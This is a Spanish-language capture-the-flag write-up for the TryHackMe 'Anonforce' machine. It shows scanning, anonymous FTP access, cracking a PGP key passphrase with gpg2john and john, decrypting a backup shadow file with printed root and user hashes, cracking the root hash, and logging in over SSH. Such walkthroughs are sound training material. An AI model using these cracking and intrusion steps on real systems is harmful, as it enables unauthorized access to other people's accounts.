> For the complete documentation index, see [llms.txt](https://enciall.gitbook.io/enciall/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://enciall.gitbook.io/enciall/ctf/try-hack-me/anonforce.md).

# Anonforce

| Campo                 | Detalle                                                    |
| --------------------- | ---------------------------------------------------------- |
| Nombre de la máquina: | Anonforce                                                  |
| Dificultad:           | Facil                                                      |
| Plataforma:           | [tryhackme.com](https://tryhackme.com/)                    |
| Creador:              | [tryhackme.com/p/stuxnet](https://tryhackme.com/p/stuxnet) |

### Iniciamos con un escaneo rápido para identificar los puertos abiertos:

```
nmap -p- --open -sS -sC -sV --min-rate 5000 -n -Pn $IP
```

```bash
# Nmap 7.95 scan initiated Fri May 30 22:51:34 2025 as: /usr/lib/nmap/nmap -p- --open -sS -sC -sV --min-rate 5000 -n -Pn -oN scan.txt 10.10.229.22
Nmap scan report for 10.10.229.22
Host is up (0.19s latency).
Not shown: 65157 closed tcp ports (reset), 376 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
| drwxr-xr-x   17 0        0            3700 May 30 21:48 dev
| drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
| drwx------    2 0        0           16384 Aug 11  2019 lost+found
| drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
| drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
| drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread [NSE: writeable]
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
| dr-xr-xr-x  103 0        0               0 May 30 21:48 proc
| drwx------    3 0        0            4096 Aug 11  2019 root
| drwxr-xr-x   18 0        0             540 May 30 21:48 run
| drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
| dr-xr-xr-x   13 0        0               0 May 30 21:48 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.2.18.141
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA)
|   256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA)
|_  256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

vemos dos puertos abiertos el puerto **21** (**FTP**) y el **22** (**SSH**) vemos que tenemos acceso anonimo al servico **FTP** asi que accedemos al ftp con **Anonymous** y adentro vemos que podemos explorar entre los archvios del sistema vamos a /home/melodias

```bash

ftp 10.10.147.203
Connected to 10.10.147.203.
220 (vsFTPd 3.0.3)
Name (10.10.147.203:enciall): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
bin             etc             initrd.img.old  lost+found      notread         root            srv             usr             vmlinuz.old
boot            home            lib             media           opt             run             sys             var
dev             initrd.img      lib64           mnt             proc            sbin            tmp             vmlinuz
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||20885|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Aug 11  2019 melodias
226 Directory send OK.
ftp> cd melodias
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||63514|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000           33 Aug 11  2019 user.txt
226 Directory send OK.
ftp> 
```

ademas de ver la flag de usuario vemos que existe una carpeta llamado notread si vamos vemos lo suguiente

```bash
ftp> cd /notread
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||28397|)
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
226 Directory send OK.
ftp> 
```

vemos un archivo **PGP** que es un archivo cifrado y la clave privada asi que los descargamos haciendo get archivo

una vez descargado ponemos el contenido del **private.asc** en un archiv llamado hash.txt

```bash
gpg2john private.asc > hash.txt
```

ahora deberiamos de tener un archivo llamado hash.txt lo vamos a hackear para obtener la clave secreta que contiene ese archivo

```bash
john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

```
anonforce:XXXXXXX:::anonforce <melodias@anonforce.nsa>::private.asc
```

y ahora que tenemos la clave secreta podemos ver el contenido de backup ponemos el comando y nos pide la clave la ponemos y vemos el contenido

```bash
gpg -d backup.pgp
```

```bash
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18120:0:99999:7:::
uuidd:*:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
ftp:*:18120:0:99999:7:::                                                                                                                                                                                       
```

ahora vemos que tenemos un Hash de root asi que tratamos de hackeralo nuevamente con john ponemos el hash en un nuevo archivo llamado root.txt de esta manera:

```
$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0
```

```bash
john root.txt --wordlist=/usr/share/wordlists/rockyou.txt 
```

vemos la contraseña de root y vamos a entrar a ssh con esa contraseña

```bash
ssh root@10.10.147.203
root@10.10.147.203's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Fri May 30 23:28:02 2025 from 10.6.53.219
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
root@ubuntu:~# 

```
